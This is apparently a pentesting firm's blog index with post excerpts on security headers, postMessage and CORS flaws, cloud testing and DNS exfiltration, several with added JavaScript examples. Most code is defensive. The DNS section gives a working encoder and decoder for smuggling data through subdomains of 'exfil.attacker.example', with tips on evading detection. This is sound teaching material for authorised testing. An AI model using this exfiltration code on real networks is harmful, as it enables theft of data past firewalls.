
Your Vulnerability Management Sucks

Published: 16 March 2022

On March 16th I had the pleasure of speaking at the Yorkshire Cyber Security Cluster about Vulnerability Management. I've included my slides from the presentation and some speaker notes on the content covered here.



HTTP Security Headers: Cache-Control

Published: 21 February 2022

The Cache-Control HTTP response header tells the web browser, and any intermediaries such as web proxies, whether and how the response may be cached. As a rule, if a page contains confidential information it should not be cached at all: if that content is stored on a user's device, and the device is public or shared with other users, another user with access to the device may be able to read it.



HTTP Security Headers: X-Frame-Options

Published: 21 February 2022

The X-Frame-Options header tells a web browser whether the target page may be rendered inside a frame (a frame, iframe, embed, or object tag). It can be used to prevent attacks such as clickjacking.
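The two header posts above describe what Cache-Control and X-Frame-Options are for; the following added example (my code, not from either post) audits a captured set of response headers for the mistakes they warn about. Header names are matched case-insensitively as HTTP requires, and the header values shown in the usage note are constructed for illustration.

```javascript
// Parse a Cache-Control value into a map of directive -> value (true when
// the directive has no argument). Directive names are case-insensitive.
function parseCacheControl(value) {
  const directives = {};
  if (!value) return directives;
  for (const part of value.split(",")) {
    const token = part.trim().toLowerCase();
    if (!token) continue;
    const eq = token.indexOf("=");
    if (eq === -1) {
      directives[token] = true;
    } else {
      directives[token.slice(0, eq).trim()] =
        token.slice(eq + 1).trim().replace(/^"|"$/g, "");
    }
  }
  return directives;
}

// Case-insensitive lookup over a plain object of response headers.
function getHeader(headers, name) {
  const wanted = name.toLowerCase();
  for (const [k, v] of Object.entries(headers)) {
    if (k.toLowerCase() === wanted) return v;
  }
  return undefined;
}

// Returns a list of findings; an empty list means nothing was flagged.
// `sensitive` states whether the response body carries confidential data.
function auditHeaders(headers, { sensitive }) {
  const findings = [];

  const cc = parseCacheControl(getHeader(headers, "Cache-Control"));
  if (sensitive) {
    // Only "no-store" forbids writing the response to any cache.
    // "no-cache" still allows storage and merely forces revalidation before
    // reuse, and "private" still allows the browser's own cache.
    if (!cc["no-store"]) {
      findings.push("Cache-Control: sensitive response is missing no-store");
    }
    if (cc["public"]) {
      findings.push("Cache-Control: sensitive response is marked public");
    }
  }

  const xfo = getHeader(headers, "X-Frame-Options");
  if (xfo === undefined) {
    findings.push("X-Frame-Options: header absent, page can be framed (clickjacking)");
  } else {
    const v = xfo.trim().toUpperCase();
    // DENY and SAMEORIGIN are the only values current browsers honour;
    // ALLOW-FROM and anything else is ignored, leaving the page unprotected.
    if (v !== "DENY" && v !== "SAMEORIGIN") {
      findings.push(`X-Frame-Options: unsupported value "${xfo}", ignored by browsers`);
    }
  }
  return findings;
}

// Demo on constructed headers (runs only when executed directly under Node).
if (typeof require !== "undefined" && require.main === module) {
  console.log(auditHeaders(
    { "Cache-Control": "private, no-cache, max-age=0", "X-Frame-Options": "ALLOW-FROM https://partner.example" },
    { sensitive: true }
  ));
}
```

Feed it the headers from a proxy capture of an authenticated page and treat each finding as a test observation. One caveat the check does not cover: a Content-Security-Policy with a frame-ancestors directive takes precedence over X-Frame-Options in browsers that support it, so a page can be protected even when this audit reports the header as absent.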



[Webinar] Your Security Testing Sucks

Published: 10 February 2022

Akimbo hosted a Webinar to cover hints and tips about how to implement effective penetration testing. We're sharing the recording for those that couldn't make it on the day!



[Webinar] What Has Awareness Ever Given Us?

Published: 17 January 2022

Akimbo joined Ian Murphy from CyberOff for a Webinar to cover hints and tips about how to implement effective security awareness. We're sharing the recording for those that couldn't make it on the day!



[Webinar] Your System Hardening Sucks

Published: 17 December 2021

Akimbo hosted a Webinar to cover hints and tips about how to implement effective system hardening. We're sharing the recording for those that couldn't make it on the day!



[Webinar] Your Security Awareness Training Sucks

Published: 13 December 2021

Akimbo hosted a Webinar to cover hints and tips about running more effective Security Awareness Training. We're sharing the recording for those that couldn't make it on the day!



The OWASP Top 10

Published: 03 December 2021

The "OWASP Top 10" is an awareness document, updated roughly every three years, that covers ten significant categories of vulnerability that organisations should be concerned about. The categories are ordered on a combination of potential impact, exploitability, and prevalence. The latest version was released in September 2021.



ScotSoft: Building and Breaking Web Applications

Published: 11 October 2021

On October 7th I had the pleasure of speaking at ScotSoft 2021 about Penetration Testing and breaking Web Applications. I've included my slides from the presentation and some speaker notes on the content covered here.



What is Penetration Testing?

Published: 22 August 2021

Penetration Testing, often abbreviated to PenTesting, is a method of testing the security of a system by attempting to discover and actively exploit vulnerabilities within it. It is amongst the most effective methods of determining the actual risk posed by a system, because the risk of the vulnerabilities found is not merely estimated: they are exploited to determine how much leverage they would give an attacker.



HTML5: Cross Domain Messaging (PostMessage) Vulnerabilities

Published: 06 August 2021

HTML5 PostMessage (also known as Web Messaging or Cross Domain Messaging) is a method of passing arbitrary data between origins. However, if it is not implemented correctly it can lead to sensitive information disclosure or cross-site scripting, because origin validation is left entirely up to the developer!
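The weakness the post refers to is the receiving handler trusting any sender. The added example below (mine, not the post's code) shows a substring origin check that an attacker-controlled page can satisfy, beside an exact-match allowlist, plus a sender that names its target origin instead of using "*". The handler takes only the `origin` and `data` fields of a MessageEvent so it can be exercised outside a browser; the allowlisted origins and message types are assumed values.

```javascript
// Origins this page is willing to accept messages from (assumed values).
const TRUSTED_ORIGINS = new Set([
  "https://app.example.com",
  "https://widgets.example.com",
]);

// Weak check seen in many real handlers: a substring test on event.origin.
// "https://app.example.com.attacker.net" passes, so an attacker page can
// send messages this handler will trust.
function weakOriginCheck(origin) {
  return origin.indexOf("app.example.com") !== -1;
}

// Hardened check: exact, case-sensitive match against the allowlist. The
// browser already normalises event.origin to scheme://host[:port], so exact
// comparison is correct; substring, prefix/suffix and unanchored regex
// tests are all bypassable.
function isTrustedOrigin(origin) {
  return TRUSTED_ORIGINS.has(origin);
}

// Handler for "message" events. Returns the accepted command, or null when
// the message is rejected, so callers can observe the decision.
function handleMessage(event, checkOrigin = isTrustedOrigin) {
  if (!checkOrigin(event.origin)) return null;

  // Validate the payload too: a trusted origin can itself be compromised
  // (e.g. by XSS), so event.data is still untrusted input.
  let msg = event.data;
  if (typeof msg === "string") {
    try { msg = JSON.parse(msg); } catch (e) { return null; }
  }
  if (!msg || typeof msg !== "object" || typeof msg.type !== "string") return null;
  if (!["setTheme", "resize"].includes(msg.type)) return null;
  // Coerce the value to a string; never pass it to innerHTML or eval.
  return { type: msg.type, value: String(msg.value === undefined ? "" : msg.value) };
}

// Sending side: always name the target origin. With "*" the message is
// delivered to whatever document the target window has since navigated to.
function sendToWidget(targetWindow, payload) {
  targetWindow.postMessage(JSON.stringify(payload), "https://widgets.example.com");
}

// In a page, register the hardened handler like this:
//   window.addEventListener("message", (event) => {
//     const cmd = handleMessage(event);
//     if (cmd) applyCommand(cmd); // assumed application function
//   });

if (typeof require !== "undefined" && require.main === module) {
  const lookalike = { origin: "https://app.example.com.attacker.net", data: '{"type":"setTheme","value":"dark"}' };
  console.log("weak check accepts lookalike:", handleMessage(lookalike, weakOriginCheck) !== null);
  console.log("exact check accepts lookalike:", handleMessage(lookalike) !== null);
}
```

When testing a handler, send it a message from an origin that merely contains the expected hostname as a substring, and from an origin of the same host over plain http; both should be rejected.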



HTML5: Cross Origin Resource Sharing (CORS) Vulnerabilities

Published: 06 August 2021

By default the Same-Origin Policy (SOP) won't allow bi-directional communication between two separate origins; however, as applications scale up there may be a requirement to allow it. Think of companies such as Google, which also owns YouTube, or Microsoft, which also owns Outlook and Skype. They may well want inter-origin communication.
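The usual way CORS goes wrong when that requirement is met is a server that reflects whatever Origin it receives and also allows credentials. The following added example (mine, not from the post) decides the CORS response headers for a request's Origin in both the vulnerable and the hardened form, as plain functions so the behaviour can be checked without a server; the allowlisted origins are assumed values.

```javascript
// Vulnerable pattern: reflect the request's Origin and allow credentials.
// Browsers refuse "*" together with credentials, so developers "fix" that by
// echoing the Origin back, which lets any site read authenticated responses
// from this API using the victim's cookies.
function corsHeadersReflecting(requestOrigin) {
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// Origins allowed to make credentialed cross-origin requests (assumed values).
const ALLOWED_ORIGINS = new Set([
  "https://www.example.com",
  "https://app.example.com",
]);

// Hardened pattern: exact-match allowlist. Returns no CORS headers at all for
// anything else, so the browser falls back to enforcing SOP. The literal
// "null" origin (sandboxed iframes, file:// pages, some redirects) is never
// trusted because any attacker can produce it.
function corsHeadersAllowlisted(requestOrigin) {
  if (requestOrigin === undefined || requestOrigin === "null") return {};
  if (!ALLOWED_ORIGINS.has(requestOrigin)) return {};
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
    // The response now differs per Origin, so caches must key on it.
    "Vary": "Origin",
  };
}

// The probe a tester sends: a foreign Origin. If it comes back reflected
// together with Allow-Credentials: true, the endpoint is exploitable.
function reflectsArbitraryOrigin(corsHandler, probe = "https://attacker.example") {
  const h = corsHandler(probe);
  return h["Access-Control-Allow-Origin"] === probe &&
         h["Access-Control-Allow-Credentials"] === "true";
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("reflecting handler exploitable:", reflectsArbitraryOrigin(corsHeadersReflecting));
  console.log("allowlisted handler exploitable:", reflectsArbitraryOrigin(corsHeadersAllowlisted));
}
```

In a real framework the hardened function's result is copied onto the response (and the same decision applied to the OPTIONS preflight). When testing, also try an Origin of `null` and one where the expected hostname is only a prefix of the attacker's, since `startsWith`/`endsWith` allowlists are a common variant of the reflection bug.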



An Introduction to PenTesting Azure

Published: 06 August 2021

I recently wrote an introduction to PenTesting an AWS environment. That was a sensible place to start given that, as I noted there, in Q1 of 2018 Amazon held a 33% market share in cloud whereas Microsoft held only 13%. However, I did want to add a few notes that are specific to PenTesting within Azure environments here.

Many of the concepts are the same. In my AWS article I broke the perspective a penetration tester could take of a cloud environment down into testing "on the cloud", "in the cloud", and "testing the cloud console". That concept remains the same, which is:



Spoofing Packets and DNS Exfiltration

Published: 06 August 2021

Following a successful penetration test, you may have large amounts of data to exfiltrate from an environment specifically hardened to make exfiltration difficult. For example, the network might have a firewall that explicitly blocks common exfiltration channels such as SSH, HTTPS and HTTP.

It is often still possible to exfiltrate data from such networks using DNS. For example, you could make a request for a domain name you control where the subdomain carries the information to be exfiltrated, such as sensitive-data-here.attacker.example.com. DNS is a recursive system: if you send that request to the local DNS server, it will be forwarded on until it reaches the authoritative server. If you control the authoritative server, you can simply read the sensitive data from its query logs.
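The one-line example above glosses over two constraints a practitioner hits immediately: a DNS label is at most 63 characters and a full name at most 253, and resolvers may change the case of labels in transit. The added example below (mine, not the post's tooling) encodes a blob as a sequence of query names under a zone you control, and decodes the names back from the authoritative server's query log; the zone name and the sample secret are constructed for illustration.

```javascript
const LABEL_MAX = 63;  // maximum length of one DNS label
const NAME_MAX = 253;  // maximum length of a full name in presentation form

// Encode `data` (string or Buffer) into DNS names of the form
// <seq>.<hex label>.<hex label>.<zone>. Hex is used rather than base64
// because names are case-insensitive and case may not survive resolution.
// A fixed-width hex sequence label lets the receiver reorder queries that
// arrive out of order and drop duplicates caused by retries.
function encodeForDns(data, zone, labelsPerQuery = 2) {
  const hex = Buffer.from(data).toString("hex");
  const seqWidth = 4; // up to 65535 queries per transfer
  // Dots: one after the sequence label and one after each data label.
  const overhead = seqWidth + labelsPerQuery + 1 + zone.length;
  if (overhead + labelsPerQuery * LABEL_MAX > NAME_MAX) {
    throw new Error("zone too long for the requested labelsPerQuery");
  }
  const perQuery = labelsPerQuery * LABEL_MAX;
  const names = [];
  for (let i = 0, seq = 0; i < hex.length; i += perQuery, seq++) {
    const piece = hex.slice(i, i + perQuery);
    const labels = [];
    for (let j = 0; j < piece.length; j += LABEL_MAX) {
      labels.push(piece.slice(j, j + LABEL_MAX));
    }
    names.push([seq.toString(16).padStart(seqWidth, "0"), ...labels, zone].join("."));
  }
  return names;
}

// Reassemble from the names seen at the authoritative server. Tolerates
// case changes, a trailing dot, unrelated queries and duplicate retries.
function decodeFromDns(names, zone) {
  const suffix = "." + zone.toLowerCase();
  const parts = new Map();
  for (const raw of names) {
    const name = raw.toLowerCase().replace(/\.$/, "");
    if (!name.endsWith(suffix)) continue;
    const labels = name.slice(0, -suffix.length).split(".");
    const seq = parseInt(labels[0], 16);
    if (Number.isNaN(seq)) continue;
    parts.set(seq, labels.slice(1).join(""));
  }
  const ordered = [...parts.keys()].sort((a, b) => a - b).map((k) => parts.get(k));
  return Buffer.from(ordered.join(""), "hex");
}

if (typeof require !== "undefined" && require.main === module) {
  // Constructed sample data and zone.
  const names = encodeForDns("user:alice\npassword:hunter2\n", "exfil.attacker.example");
  console.log(names);
  console.log(decodeFromDns(names, "exfil.attacker.example").toString());
}
```

Each name is then resolved from inside the target network (for example with `nslookup` or `dig`) and read back from the authoritative server's logs or a packet capture on it. Two caveats: the local resolver caches answers, so a repeated chunk will not reach you unless the sequence label makes every name unique, and a large burst of long, high-entropy subdomains is exactly what DNS exfiltration detection looks for, so throttle the queries on a real engagement.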



An Introduction to Penetration Testing AWS

Published: 06 August 2021

When penetration testing Amazon Web Services (AWS) environments there are different perspectives the assessment could consider, some are very similar to external infrastructure/web application assessments and some are different.

I’ll separate the things that are the same from the things that are different to traditional penetration testing by considering the following types of cloud testing, then breaking each one down into the kinds of testing that could take place:

